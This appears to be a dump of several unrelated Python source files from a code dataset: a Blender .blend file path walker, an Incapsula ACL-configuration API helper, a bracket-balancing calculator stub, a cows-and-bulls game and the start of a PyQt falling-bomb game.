path, sub_block, sub_path)\n \"\"\"\n __slots__ = ()\n\n def _get_cb(self):\n block, path, sub_block, sub_path = self.userdata\n return block[path] + sub_block[sub_path]\n\n def _set_cb(self, filepath):\n block, path, sub_block, sub_path = self.userdata\n head, sep, tail = utils.splitpath(filepath)\n\n block[path] = head + sep\n sub_block[sub_path] = tail\n\n def _set_cb_edits(self, filepath, binary_edits):\n block, path, sub_block, sub_path = self.userdata\n head, sep, tail = utils.splitpath(filepath)\n\n self._filepath_assign_edits(block, path, head + sep, binary_edits)\n self._filepath_assign_edits(sub_block, sub_path, tail, binary_edits)\n\n\nclass FPElem_sequence_image_seq(FPElem_sequence_single):\n \"\"\"\n Image sequence\n userdata = (block, path, sub_block, sub_path)\n \"\"\"\n __slots__ = ()\n\n def files_siblings(self):\n block, path, sub_block, sub_path = self.userdata\n\n array = block.get_pointer(b'stripdata')\n files = [array.get(b'name', use_str=False, base_index=i) for i in range(array.count)]\n return files\n\n\nclass FilePath:\n __slots__ = ()\n\n def __new__(cls, *args, **kwargs):\n raise RuntimeError(\"%s should not be instantiated\" % cls)\n\n # ------------------------------------------------------------------------\n # Main function to visit paths\n @staticmethod\n def visit_from_blend(\n filepath,\n\n # never modify the blend\n readonly=True,\n # callback that creates a temp file and returns its path.\n temp_remap_cb=None,\n\n # recursive options\n recursive=False,\n # recurse all indirectly linked data\n # (not just from the initially referenced blend file)\n recursive_all=False,\n # list of ID block names we want to load, or None to load all\n block_codes=None,\n # root when we're loading libs indirectly\n rootdir=None,\n level=0,\n # dict of id's used so we don't follow these links again\n # prevents cyclic references too!\n # {lib_path: set([block id's ...])}\n lib_visit=None,\n\n # optional blendfile callbacks\n # These callbacks run on enter-exit blend files\n # so you can keep track of what file and level you're at.\n blendfile_level_cb=(None, None),\n ):\n # print(level, block_codes)\n import os\n\n filepath = os.path.abspath(filepath)\n\n indent_str = \" \" * level\n # print(indent_str + \"Opening:\", filepath)\n # print(indent_str + \"... blocks:\", block_codes)\n\n log = log_deps.getChild('visit_from_blend')\n log.info(\"~\")\n log.info(\"%sOpening: %s\", indent_str, filepath)\n if VERBOSE:\n log.info(\"%s blocks: %s\", indent_str, set_as_str(block_codes))\n\n blendfile_level_cb_enter, blendfile_level_cb_exit = blendfile_level_cb\n\n if blendfile_level_cb_enter is not None:\n blendfile_level_cb_enter(filepath)\n\n basedir = os.path.dirname(filepath)\n if rootdir is None:\n rootdir = basedir\n\n if lib_visit is None:\n lib_visit = {}\n\n\n\n if recursive and (level > 0) and (block_codes is not None) and (recursive_all is False):\n # prevent from expanding the\n # same datablock more then once\n # note: we could *almost* id_name, however this isn't unique for libraries.\n expand_addr_visit = set()\n # {lib_id: {block_ids... 
}}\n expand_codes_idlib = {}\n\n # libraries used by this blend\n block_codes_idlib = set()\n\n # XXX, checking 'block_codes' isn't 100% reliable,\n # but at least don't touch the same blocks twice.\n # whereas block_codes is intended to only operate on blocks we requested.\n lib_block_codes_existing = lib_visit.setdefault(filepath, set())\n\n # only for this block\n def _expand_codes_add_test(block, code):\n # return True, if the ID should be searched further\n #\n # we could investigate a better way...\n # Not to be accessing ID blocks at this point. but its harmless\n if code == b'ID':\n assert(code == block.code)\n if recursive:\n expand_codes_idlib.setdefault(block[b'lib'], set()).add(block[b'name'])\n return False\n else:\n id_name = block[b'id', b'name']\n\n # if we touched this already, don't touch again\n # (else we may modify the same path multiple times)\n #\n # FIXME, works in some cases but not others\n # keep, without this we get errors\n # Gooseberry r668\n # bam pack scenes/01_island/01_meet_franck/01_01_01_A/01_01_01_A.comp.blend\n # gives strange errors\n '''\n if id_name not in block_codes:\n return False\n '''\n\n # instead just don't operate on blocks multiple times\n # ... rather than attempt to check on what we need or not.\n len_prev = len(lib_block_codes_existing)\n lib_block_codes_existing.add(id_name)\n if len_prev == len(lib_block_codes_existing):\n return False\n\n len_prev = len(expand_addr_visit)\n expand_addr_visit.add(block.addr_old)\n return (len_prev != len(expand_addr_visit))\n\n def block_expand(block, code):\n assert(block.code == code)\n if _expand_codes_add_test(block, code):\n yield block\n\n assert(block.code == code)\n fn = ExpandID.expand_funcs.get(code)\n if fn is not None:\n for sub_block in fn(block):\n if sub_block is not None:\n yield from block_expand(sub_block, sub_block.code)\n else:\n if code == b'ID':\n yield block\n else:\n expand_addr_visit = None\n\n # set below\n expand_codes_idlib = None\n\n # never set\n block_codes_idlib = None\n\n def block_expand(block, code):\n assert(block.code == code)\n yield block\n\n # ------\n # Define\n #\n # - iter_blocks_id(code)\n # - iter_blocks_idlib()\n if block_codes is None:\n def iter_blocks_id(code):\n return blend.find_blocks_from_code(code)\n\n def iter_blocks_idlib():\n return blend.find_blocks_from_code(b'LI')\n else:\n def iter_blocks_id(code):\n for block in blend.find_blocks_from_code(code):\n if block[b'id', b'name'] in block_codes:\n yield from block_expand(block, code)\n\n if block_codes_idlib is not None:\n def iter_blocks_idlib():\n for block in blend.find_blocks_from_code(b'LI'):\n # TODO, this should work but in fact mades some libs not link correctly.\n if block[b'name'] in block_codes_idlib:\n yield from block_expand(block, b'LI')\n else:\n def iter_blocks_idlib():\n return blend.find_blocks_from_code(b'LI')\n\n if temp_remap_cb is not None:\n filepath_tmp = temp_remap_cb(filepath, rootdir)\n else:\n filepath_tmp = filepath\n\n # store info to pass along with each iteration\n extra_info = rootdir, os.path.basename(filepath)\n\n with blendfile.open_blend(filepath_tmp, \"rb\" if readonly else \"r+b\") as blend:\n\n for code in blend.code_index.keys():\n # handle library blocks as special case\n if ((len(code) != 2) or\n (code in {\n # libraries handled below\n b'LI',\n b'ID',\n # unneeded\n b'WM',\n b'SN', # bScreen\n })):\n\n continue\n\n # if VERBOSE:\n # print(\" Scanning\", code)\n\n for block in iter_blocks_id(code):\n yield from FilePath.from_block(block, basedir, 
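# --- Illustrative sketch (not part of the original module): the
# `lib_visit` / `expand_addr_visit` bookkeeping above is a standard
# "visited set" guard; it keeps the recursive expansion from walking the same
# datablock twice and protects against cyclic references.
def walk(graph, node, visited=None):
    visited = set() if visited is None else visited
    if node in visited:   # already expanded: stop, much like
        return            # _expand_codes_add_test returning False
    visited.add(node)
    yield node
    for child in graph.get(node, ()):
        yield from walk(graph, child, visited)

cyclic = {'A': ['B'], 'B': ['A', 'C']}
assert list(walk(cyclic, 'A')) == ['A', 'B', 'C']  # terminates despite the cycle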
extra_info, level)\n\n # print(\"A:\", expand_addr_visit)\n # print(\"B:\", block_codes)\n if VERBOSE:\n log.info(\"%s expand_addr_visit=%s\", indent_str, set_as_str(expand_addr_visit))\n\n if recursive:\n\n if expand_codes_idlib is None:\n expand_codes_idlib = {}\n for block in blend.find_blocks_from_code(b'ID'):\n expand_codes_idlib.setdefault(block[b'lib'], set()).add(block[b'name'])\n\n # look into libraries\n lib_all = []\n\n for lib_id, lib_block_codes in sorted(expand_codes_idlib.items()):\n lib = blend.find_block_from_offset(lib_id)\n lib_path = lib[b'name']\n\n # get all data needed to read the blend files here (it will be freed!)\n # lib is an address at the moment, we only use as a way to group\n\n lib_all.append((lib_path, lib_block_codes))\n # import IPython; IPython.embed()\n\n # ensure we expand indirect linked libs\n if block_codes_idlib is not None:\n block_codes_idlib.add(lib_path)\n\n # do this after, incase we mangle names above\n for block in iter_blocks_idlib():\n yield from FilePath.from_block(block, basedir, extra_info, level)\n del blend\n\n\n # ----------------\n # Handle Recursive\n if recursive:\n # now we've closed the file, loop on other files\n\n # note, sorting - isn't needed, it just gives predictable load-order.\n for lib_path, lib_block_codes in lib_all:\n lib_path_abs = os.path.normpath(utils.compatpath(utils.abspath(lib_path, basedir)))\n\n # if we visited this before,\n # check we don't follow the same links more than once\n lib_block_codes_existing = lib_visit.setdefault(lib_path_abs, set())\n lib_block_codes -= lib_block_codes_existing\n\n # don't touch them again\n # XXX, this is now maintained in \"_expand_generic_material\"\n # lib_block_codes_existing.update(lib_block_codes)\n\n # print(\"looking for\", lib_block_codes)\n\n if not lib_block_codes:\n if VERBOSE:\n print((indent_str + \" \"), \"Library Skipped (visited): \", filepath, \" -> \", lib_path_abs, sep=\"\")\n continue\n\n if not os.path.exists(lib_path_abs):\n if VERBOSE:\n print((indent_str + \" \"), \"Library Missing: \", filepath, \" -> \", lib_path_abs, sep=\"\")\n continue\n\n # import IPython; IPython.embed()\n if VERBOSE:\n print((indent_str + \" \"), \"Library: \", filepath, \" -> \", lib_path_abs, sep=\"\")\n # print((indent_str + \" \"), lib_block_codes)\n yield from FilePath.visit_from_blend(\n lib_path_abs,\n readonly=readonly,\n temp_remap_cb=temp_remap_cb,\n recursive=True,\n block_codes=lib_block_codes,\n rootdir=rootdir,\n level=level + 1,\n lib_visit=lib_visit,\n blendfile_level_cb=blendfile_level_cb,\n )\n\n if blendfile_level_cb_exit is not None:\n blendfile_level_cb_exit(filepath)\n\n # ------------------------------------------------------------------------\n # Direct filepaths from Blocks\n #\n # (no expanding or following references)\n\n @staticmethod\n def from_block(block: blendfile.BlendFileBlock, basedir, extra_info, level):\n assert(block.code != b'DATA')\n fn = FilePath._from_block_dict.get(block.code)\n if fn is None:\n return\n\n yield from fn(block, basedir, extra_info, level)\n\n @staticmethod\n def _from_block_OB(block, basedir, extra_info, level):\n # 'ob->modifiers[...].filepath'\n for block_mod in bf_utils.iter_ListBase(\n block.get_pointer((b'modifiers', b'first')),\n next_item=(b'modifier', b'next')):\n item_md_type = block_mod[b'modifier', b'type']\n if item_md_type == C_defs.eModifierType_MeshCache:\n yield FPElem_block_path(basedir, level, (block_mod, b'filepath')), extra_info\n\n @staticmethod\n def _from_block_MC(block, basedir, extra_info, 
level):\n # TODO, image sequence\n fp = FPElem_block_path(basedir, level, (block, b'name'))\n fp.is_sequence = True\n yield fp, extra_info\n\n @staticmethod\n def _from_block_IM(block, basedir, extra_info, level):\n # old files miss this\n image_source = block.get(b'source', C_defs.IMA_SRC_FILE)\n if image_source not in {C_defs.IMA_SRC_FILE, C_defs.IMA_SRC_SEQUENCE, C_defs.IMA_SRC_MOVIE}:\n return\n if block[b'packedfile']:\n return\n\n fp = FPElem_block_path(basedir, level, (block, b'name'))\n if image_source == C_defs.IMA_SRC_SEQUENCE:\n fp.is_sequence = True\n yield fp, extra_info\n\n @staticmethod\n def _from_block_VF(block, basedir, extra_info, level):\n if block[b'packedfile']:\n return\n if block[b'name'] != b'': # builtin font\n yield FPElem_block_path(basedir, level, (block, b'name')), extra_info\n\n @staticmethod\n def _from_block_SO(block, basedir, extra_info, level):\n if block[b'packedfile']:\n return\n yield FPElem_block_path(basedir, level, (block, b'name')), extra_info\n\n @staticmethod\n def _from_block_ME(block, basedir, extra_info, level):\n block_external = block.get_pointer((b'ldata', b'external'), None)\n if block_external is None:\n block_external = block.get_pointer((b'fdata', b'external'), None)\n\n if block_external is not None:\n yield FPElem_block_path(basedir, level, (block_external, b'filename')), extra_info\n\n if USE_ALEMBIC_BRANCH:\n @staticmethod\n def _from_block_CL(block, basedir, extra_info, level):\n if block[b'source_mode'] == C_defs.CACHE_LIBRARY_SOURCE_CACHE:\n yield FPElem_block_path(basedir, level, (block, b'input_filepath')), extra_info\n\n @staticmethod\n def _from_block_CF(block, basedir, extra_info, level):\n yield FPElem_block_path(basedir, level, (block, b'filepath')), extra_info\n\n\n @staticmethod\n def _from_block_SC(block, basedir, extra_info, level):\n block_ed = block.get_pointer(b'ed')\n if block_ed is not None:\n sdna_index_Sequence = block.file.sdna_index_from_id[b'Sequence']\n\n def seqbase(someseq):\n for item in someseq:\n item_type = item.get(b'type', sdna_index_refine=sdna_index_Sequence)\n\n if item_type >= C_defs.SEQ_TYPE_EFFECT:\n pass\n elif item_type == C_defs.SEQ_TYPE_META:\n yield from seqbase(bf_utils.iter_ListBase(\n item.get_pointer((b'seqbase', b'first'), sdna_index_refine=sdna_index_Sequence)))\n else:\n item_strip = item.get_pointer(b'strip', sdna_index_refine=sdna_index_Sequence)\n if item_strip is None: # unlikely!\n continue\n item_stripdata = item_strip.get_pointer(b'stripdata')\n\n if item_type == C_defs.SEQ_TYPE_IMAGE:\n yield FPElem_sequence_image_seq(\n basedir, level, (item_strip, b'dir', item_stripdata, b'name')), extra_info\n elif item_type in {C_defs.SEQ_TYPE_MOVIE, C_defs.SEQ_TYPE_SOUND_RAM, C_defs.SEQ_TYPE_SOUND_HD}:\n yield FPElem_sequence_single(\n basedir, level, (item_strip, b'dir', item_stripdata, b'name')), extra_info\n\n yield from seqbase(bf_utils.iter_ListBase(block_ed.get_pointer((b'seqbase', b'first'))))\n\n @staticmethod\n def _from_block_LI(block, basedir, extra_info, level):\n if block.get(b'packedfile', None):\n return\n\n yield FPElem_block_path(basedir, level, (block, b'name')), extra_info\n\n # _from_block_IM --> {b'IM': _from_block_IM, ...}\n _from_block_dict = {\n k.rpartition(\"_\")[2].encode('ascii'): s_fn.__func__ for k, s_fn in locals().items()\n if isinstance(s_fn, staticmethod)\n if k.startswith(\"_from_block_\")\n }\n\n\nclass bf_utils:\n @staticmethod\n def iter_ListBase(block, next_item=b'next'):\n while block:\n yield block\n block = 
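# --- Illustrative sketch (not part of the original module): the
# iter_ListBase pattern used throughout this module walks Blender's intrusive
# linked lists, starting from a 'first' pointer and following each block's
# 'next' field until it is null. Toy dicts stand in for BlendFileBlocks.
def iter_listbase(node):
    while node is not None:
        yield node
        node = node.get('next')

c = {'name': 'c', 'next': None}
b = {'name': 'b', 'next': c}
a = {'name': 'a', 'next': b}
assert [n['name'] for n in iter_listbase(a)] == ['a', 'b', 'c']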
block.file.find_block_from_offset(block[next_item])\n\n def iter_array(block, length=-1):\n assert(block.code == b'DATA')\n from . import blendfile\n import os\n handle = block.file.handle\n header = block.file.header\n\n for i in range(length):\n block.file.handle.seek(block.file_offset + (header.pointer_size * i), os.SEEK_SET)\n offset = blendfile.DNA_IO.read_pointer(handle, header)\n sub_block = block.file.find_block_from_offset(offset)\n yield sub_block\n\n\n# -----------------------------------------------------------------------------\n# ID Expand\n\nclass ExpandID:\n # fake module\n #\n # TODO:\n #\n # Array lookups here are _WAY_ too complicated,\n # we need some nicer way to represent pointer indirection (easy like in C!)\n # but for now, use what we have.\n #\n __slots__ = ()\n\n def __new__(cls, *args, **kwargs):\n raise RuntimeError(\"%s should not be instantiated\" % cls)\n\n @staticmethod\n def _expand_generic_material(block):\n array_len = block.get(b'totcol')\n if array_len != 0:\n array = block.get_pointer(b'mat')\n for sub_block in bf_utils.iter_array(array, array_len):\n yield sub_block\n\n @staticmethod\n def _expand_generic_mtex(block):\n field = block.dna_type.field_from_name[b'mtex']\n array_len = field.dna_size // block.file.header.pointer_size\n\n for i in range(array_len):\n item = block.get_pointer((b'mtex', i))\n if item:\n yield item.get_pointer(b'tex')\n yield item.get_pointer(b'object')\n\n @staticmethod\n def _expand_generic_nodetree(block):\n assert(block.dna_type.dna_type_id == b'bNodeTree')\n\n sdna_index_bNode = block.file.sdna_index_from_id[b'bNode']\n for item in bf_utils.iter_ListBase(block.get_pointer((b'nodes', b'first'))):\n item_type = item.get(b'type', sdna_index_refine=sdna_index_bNode)\n\n if item_type != 221: # CMP_NODE_R_LAYERS\n yield item.get_pointer(b'id', sdna_index_refine=sdna_index_bNode)\n\n def _expand_generic_nodetree_id(block):\n block_ntree = block.get_pointer(b'nodetree', None)\n if block_ntree is not None:\n yield from ExpandID._expand_generic_nodetree(block_ntree)\n\n @staticmethod\n def _expand_generic_animdata(block):\n block_adt = block.get_pointer(b'adt')\n if block_adt:\n yield block_adt.get_pointer(b'action')\n # TODO, NLA\n\n @staticmethod\n def expand_OB(block): # 'Object'\n yield from ExpandID._expand_generic_animdata(block)\n yield from ExpandID._expand_generic_material(block)\n\n has_dup_group = False\n yield block.get_pointer(b'data')\n if block[b'transflag'] & C_defs.OB_DUPLIGROUP:\n dup_group = block.get_pointer(b'dup_group')\n if dup_group is not None:\n has_dup_group = True\n yield dup_group\n del dup_group\n\n yield block.get_pointer(b'proxy')\n yield block.get_pointer(b'proxy_collection')\n\n if USE_ALEMBIC_BRANCH:\n if has_dup_group:\n sdna_index_CacheLibrary = block.file.sdna_index_from_id.get(b'CacheLibrary')\n if sdna_index_CacheLibrary is not None:\n yield block.get_pointer(b'cache_library')\n\n # 'ob->pose->chanbase[...].custom'\n block_pose = block.get_pointer(b'pose')\n if block_pose is not None:\n assert(block_pose.dna_type.dna_type_id == b'bPose')\n sdna_index_bPoseChannel = block_pose.file.sdna_index_from_id[b'bPoseChannel']\n for item in bf_utils.iter_ListBase(block_pose.get_pointer((b'chanbase', b'first'))):\n item_custom = item.get_pointer(b'custom', sdna_index_refine=sdna_index_bPoseChannel)\n if item_custom is not None:\n yield item_custom\n # Expand the objects 'ParticleSettings' via:\n # 'ob->particlesystem[...].part'\n sdna_index_ParticleSystem = 
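# --- Illustrative sketch (not part of the original module):
# `_expand_generic_mtex` above derives the element count of a fixed-size
# pointer array from its byte size. For example, an 18-slot mtex array in a
# 64-bit .blend file occupies 18 * 8 = 144 bytes (sizes here are hypothetical).
pointer_size = 8          # 8 on 64-bit files, 4 on 32-bit files
mtex_field_size = 144     # assumed dna_size of the 'mtex' field
array_len = mtex_field_size // pointer_size
assert array_len == 18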
block.file.sdna_index_from_id.get(b'ParticleSystem')\n if sdna_index_ParticleSystem is not None:\n for item in bf_utils.iter_ListBase(\n block.get_pointer((b'particlesystem', b'first'))):\n item_part = item.get_pointer(b'part', sdna_index_refine=sdna_index_ParticleSystem)\n if item_part is not None:\n yield item_part\n\n @staticmethod\n def expand_ME(block): # 'Mesh'\n yield from ExpandID._expand_generic_animdata(block)\n yield from ExpandID._expand_generic_material(block)\n yield block.get_pointer(b'texcomesh')\n # TODO, TexFace? - it will be slow, we could simply ignore :S\n\n @staticmethod\n def expand_CU(block): # 'Curve'\n yield from ExpandID._expand_generic_animdata(block)\n yield from ExpandID._expand_generic_material(block)\n\n sub_block = block.get_pointer(b'vfont')\n if sub_block is not None:\n yield sub_block\n yield block.get_pointer(b'vfontb')\n yield block.get_pointer(b'vfonti')\n yield block.get_pointer(b'vfontbi')\n\n yield block.get_pointer(b'bevobj')\n yield block.get_pointer(b'taperobj')\n yield block.get_pointer(b'textoncurve')\n\n @staticmethod\n def expand_MB(block): # 'MBall'\n yield from ExpandID._expand_generic_animdata(block)\n yield from ExpandID._expand_generic_material(block)\n\n @staticmethod\n def expand_AR(block): # 'bArmature'\n yield from ExpandID._expand_generic_animdata(block)\n\n @staticmethod\n def expand_LA(block): # 'Lamp'\n yield from ExpandID._expand_generic_animdata(block)\n yield from ExpandID._expand_generic_nodetree_id(block)\n yield from ExpandID._expand_generic_mtex(block)\n\n @staticmethod\n def expand_MA(block): # 'Material'\n yield from ExpandID._expand_generic_animdata(block)\n yield from ExpandID._expand_generic_nodetree_id(block)\n yield from ExpandID._expand_generic_mtex(block)\n\n yield block.get_pointer(b'group')\n\n @staticmethod\n def expand_TE(block): # 'Tex'\n yield from ExpandID._expand_generic_animdata(block)\n yield from ExpandID._expand_generic_nodetree_id(block)\n yield block.get_pointer(b'ima')\n\n @staticmethod\n def expand_WO(block): # 'World'\n yield from ExpandID._expand_generic_animdata(block)\n yield from ExpandID._expand_generic_nodetree_id(block)\n yield from ExpandID._expand_generic_mtex(block)\n\n @staticmethod\n def expand_NT(block): # 'bNodeTree'\n yield from ExpandID._expand_generic_animdata(block)\n yield from ExpandID._expand_generic_nodetree(block)\n\n @staticmethod\n def expand_PA(block): # 'ParticleSettings'\n yield from ExpandID._expand_generic_animdata(block)\n block_ren_as = block[b'ren_as']\n if block_ren_as == C_defs.PART_DRAW_GR:\n yield block.get_pointer(b'dup_group')\n elif block_ren_as == C_defs.PART_DRAW_OB:\n yield block.get_pointer(b'dup_ob')\n yield from ExpandID._expand_generic_mtex(block)\n\n @staticmethod\n def expand_SC(block): # 'Scene'\n yield from ExpandID._expand_generic_animdata(block)\n yield from ExpandID._expand_generic_nodetree_id(block)\n yield block.get_pointer(b'camera')\n yield block.get_pointer(b'world')\n yield block.get_pointer(b'set', None)\n yield block.get_pointer(b'clip', None)\n\n sdna_index_Base = block.file.sdna_index_from_id[b'Base']\n for item in bf_utils.iter_ListBase(block.get_pointer((b'base', b'first'))):\n yield item.get_pointer(b'object', sdna_index_refine=sdna_index_Base)\n\n block_ed = block.get_pointer(b'ed')\n if block_ed is not None:\n sdna_index_Sequence = block.file.sdna_index_from_id[b'Sequence']\n\n def seqbase(someseq):\n for item in someseq:\n item_type = item.get(b'type', sdna_index_refine=sdna_index_Sequence)\n\n if item_type >= 
C_defs.SEQ_TYPE_EFFECT:\n pass\n elif item_type == C_defs.SEQ_TYPE_META:\n yield from seqbase(bf_utils.iter_ListBase(\n item.get_pointer((b'seqbase', b'first'), sdna_index_refine=sdna_index_Sequence)))\n else:\n if item_type == C_defs.SEQ_TYPE_SCENE:\n yield item.get_pointer(b'scene')\n elif item_type == C_defs.SEQ_TYPE_MOVIECLIP:\n yield item.get_pointer(b'clip')\n elif item_type == C_defs.SEQ_TYPE_MASK:\n yield item.get_pointer(b'mask')\n elif item_type == C_defs.SEQ_TYPE_SOUND_RAM:\n yield item.get_pointer(b'sound')\n\n yield from seqbase(bf_utils.iter_ListBase(\n block_ed.get_pointer((b'seqbase', b'first'))))\n\n @staticmethod\n def expand_GR(block): # 'Group'\n sdna_index_GroupObject = block.file.sdna_index_from_id[b'GroupObject']\n for item in bf_utils.iter_ListBase(block.get_pointer((b'gobject', b'first'))):\n yield item.get_pointer(b'ob', sdna_index_refine=sdna_index_GroupObject)\n\n # expand_GR --> {b'GR': expand_GR, ...}\n expand_funcs = {\n k.rpartition(\"_\")[2].encode('ascii'): s_fn.__func__ for k, s_fn in locals().items()\n if isinstance(s_fn, staticmethod)\n if k.startswith(\"expand_\")\n }\n\n\n# -----------------------------------------------------------------------------\n# Packing Utility\n\n\nclass utils:\n # fake module\n __slots__ = ()\n\n def __new__(cls, *args, **kwargs):\n raise RuntimeError(\"%s should not be instantiated\" % cls)\n\n @staticmethod\n def abspath(path, start, library=None):\n import os\n if path.startswith(b'//'):\n # if library:\n # start = os.path.dirname(abspath(library.filepath))\n return os.path.join(start, path[2:])\n return path\n\n if __import__(\"os\").sep == '/':\n @staticmethod\n def compatpath(path):\n return path.replace(b'\\\\', b'/')\n else:\n @staticmethod\n def compatpath(path):\n # keep '//'\n return path[:2] + path[2:].replace(b'/', b'\\\\')\n\n @staticmethod\n def splitpath(path):\n \"\"\"\n Split the path at the last forward or backward slash.\n \"\"\"\n split1 = path.rpartition(b'/')\n split2 = path.rpartition(b'\\\\')\n if len(split1[0]) > len(split2[0]):\n return split1\n else:\n return split2\n\n @staticmethod\n def find_sequence_paths(filepath, use_fullpath=True):\n # supports str, byte paths\n basedir, filename = os.path.split(filepath)\n if not os.path.exists(basedir):\n return []\n\n filename_noext, ext = os.path.splitext(filename)\n\n from string import digits\n if isinstance(filepath, bytes):\n digits = digits.encode()\n filename_nodigits = filename_noext.rstrip(digits)\n\n if len(filename_nodigits) == len(filename_noext):\n # input isn't from a sequence\n return []\n\n files = os.listdir(basedir)\n files[:] = [\n f for f in files\n if f.startswith(filename_nodigits) and\n f.endswith(ext) and\n f[len(filename_nodigits):-len(ext) if ext else -1].isdigit()\n ]\n if use_fullpath:\n files[:] = [\n os.path.join(basedir, f) for f in files\n ]\n\n return files\n","sub_path":"engine/2.80/scripts/addons/io_blend_utils/blender_bam-unpacked.whl/bam/blend/blendfile_path_walker.py","file_name":"blendfile_path_walker.py","file_ext":"py","file_size_in_byte":34349,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"564665728","text":"#!/usr/bin/env python3\n\n\"\"\"Modifies a site's ACL rules\n\n site_id -- numerical site id to retrieve\n rule_id -- rule to change\n listed -- list of values to send for the rule\n api_id -- API ID to use (Default: environment variable)\n api_key -- API KEY to use (Default: environment variable)\n\"\"\"\n\nimport os\nimport requests\nfrom .com_error import errorProcess\n\napi_endpoint = 
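# --- Illustrative sketch (not part of the original files): the
# `expand_funcs` / `_from_block_dict` tables above are built by scraping the
# class namespace, keying each `expand_XX` staticmethod by the two-letter
# block code parsed out of its own name. A minimal version of the same trick:
class Dispatch:
    @staticmethod
    def expand_OB(block):
        return 'object:%s' % block

    @staticmethod
    def expand_ME(block):
        return 'mesh:%s' % block

    funcs = {
        k.rpartition('_')[2].encode('ascii'): f.__func__
        for k, f in locals().items()
        if isinstance(f, staticmethod) and k.startswith('expand_')
    }

assert Dispatch.funcs[b'OB']('suzanne') == 'object:suzanne'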
'https://my.incapsula.com/api/'\n\n\ndef modSiteACL(\n site_id, rule_id, listed, api_id=os.environ.get('API_ID'),\n api_key=os.environ.get('API_KEY')):\n try:\n if rule_id == 'api.acl.blacklisted_countries':\n payload = {\n 'api_id':api_id,\n 'api_key':api_key,\n 'site_id':site_id,\n 'rule_id':rule_id,\n 'countries':listed\n }\n elif rule_id == 'api.acl.blacklisted_urls':\n payload = {\n 'api_id':api_id,\n 'api_key':api_key,\n 'site_id':site_id,\n 'rule_id':rule_id,\n 'urls':listed\n }\n elif rule_id == 'api.acl.blacklisted_ips':\n payload = {\n 'api_id':api_id,\n 'api_key':api_key,\n 'site_id':site_id,\n 'rule_id':rule_id,\n 'ips':listed\n }\n elif rule_id == 'api.acl.whitelisted_ips':\n payload = {\n 'api_id':api_id,\n 'api_key':api_key,\n 'site_id':site_id,\n 'rule_id':rule_id,\n 'ips':listed\n }\n url = api_endpoint + 'prov/v1/sites/configure/acl'\n r = requests.post(url, data=payload)\n return r.text\n except Exception as error:\n return errorProcess(error)","sub_path":"incapsula/modSiteACL.py","file_name":"modSiteACL.py","file_ext":"py","file_size_in_byte":1754,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"103010723","text":"def brackets_cure(expr):\n difference = brackets_counter(expr,\"(\") - brackets_counter(expr,\")\") # difference between opening and closing brackets\n if difference > 0: # more opening brackets than closing ones\n while difference > 0:\n expr += \")\" # append a closing bracket to the end of the expression\n difference -= 1\n if difference < 0: # more closing brackets than opening ones\n while difference < 0:\n expr = expr[0 : expr.rfind(\")\")] + expr[expr.rfind(\")\") + 1 : len(expr)] # remove the last closing bracket from the expression\n difference += 1\n return expr\n\n\ndef brackets_counter(expr, bracket_type):\n counter = 0 # running count of matching brackets\n if expr.find(bracket_type) != -1: # if we find a bracket, then\n counter += 1 + brackets_counter(expr[expr.find(bracket_type)+1:len(expr)], bracket_type) # count it and recurse to find the remaining brackets\n return counter # returns zero if nothing was found, otherwise the number of brackets\n\n\n\nwhile True:\n exp = input(\"input expression to calc (or just type exit to terminate program):\")\n if exp.strip().lower() == \"exit\":\n break\n exp = exp.lower().replace(\" \", \"\") # prepare exp for parsing\n exp = brackets_cure(exp) # cure bracket mismatch\n","sub_path":"calc.py","file_name":"calc.py","file_ext":"py","file_size_in_byte":1310,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"523621865","text":"from random import randint\n\ndef play_cows_and_bulls():\n randomNumber = randint(1000, 9999)\n elements = [int(i) for i in str(randomNumber)]\n print(randomNumber)\n\n while True: \n guess = input(\"Guess a number: \")\n items = [int(i) for i in str(guess)]\n bulls = 0\n cows = 0 \n for i in range(4): \n if (items[i] == elements[i]):\n bulls += 1 # right digit in the right place\n elif items[i] in elements:\n cows += 1 # right digit in the wrong place\n \n if bulls == 4:\n break\n\n print(\"{} cows, {} bulls\".format(cows, bulls))\n\n\nplay_cows_and_bulls()","sub_path":"18.CowsAndBulls.py","file_name":"18.CowsAndBulls.py","file_ext":"py","file_size_in_byte":605,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"322045740","text":"import sys\nimport random\n\nfrom PyQt5.QtCore import QCoreApplication, QRect, QSize\nfrom PyQt5.QtGui import QIcon, QCursor, QPainter, QPen, QBrush, QColor, QPixmap, 
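# --- Illustrative sketch (not part of the original files): quick sanity
# checks for the (corrected) bracket-balancing helpers above; the fixed slice
# drops exactly one trailing ')' per excess closing bracket.
def count(expr, ch):
    return expr.count(ch)  # equivalent to the recursive brackets_counter

def cure(expr):
    diff = count(expr, '(') - count(expr, ')')
    while diff > 0:
        expr += ')'
        diff -= 1
    while diff < 0:
        i = expr.rfind(')')
        expr = expr[:i] + expr[i + 1:]
        diff += 1
    return expr

assert cure('(1+(2') == '(1+(2))'
assert cure('1+2))') == '1+2'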
QImage, QPalette\nfrom PyQt5.QtWidgets import QMainWindow, QApplication, QWidget, QDesktopWidget, QPushButton, QHBoxLayout, QVBoxLayout, \\\n QLabel\nfrom PyQt5.QtCore import Qt\nfrom PyQt5 import QtGui, QtWidgets, QtCore\n\n\nclass Bomba:\n def __init__(self, screen: QWidget, x: int = 110, y: int=0, width: int=25, height: int=25, img: str='Slike/bomba3.png'):\n\n self.x = x\n self.y = y\n self.width = width\n self.height = height\n self.img = img\n\n self.crko=False\n\n self.label = QLabel(screen)\n self.image_pixmap = QPixmap(self.img)\n self.label.setPixmap(self.image_pixmap)\n self.label.setGeometry(self.x, self.y, self.width, self.height)\n self.label.show()\n\n def moveMeDown(self):\n self.y = self.y+20\n self.label.setGeometry(self.x,self.y,self.width,self.height)\n\n def getCoords(self):\n return self.x,self.y\n\n def skloniMeMolimTe(self):\n self.label.hide()\n\n\nclass BombaFactory():\n def __init__(self, screen: QWidget):\n self.y=0\n self.width=25\n self.height=25\n self.screen=screen\n\n\n def createRandomBomba(self):\n x_values=[110,183,263,343,414]\n self.x = x_values[random.randint(0,4)]\n self.bomba=Bomba(self.screen, self.x,self.y,self.width,self.height)\n return 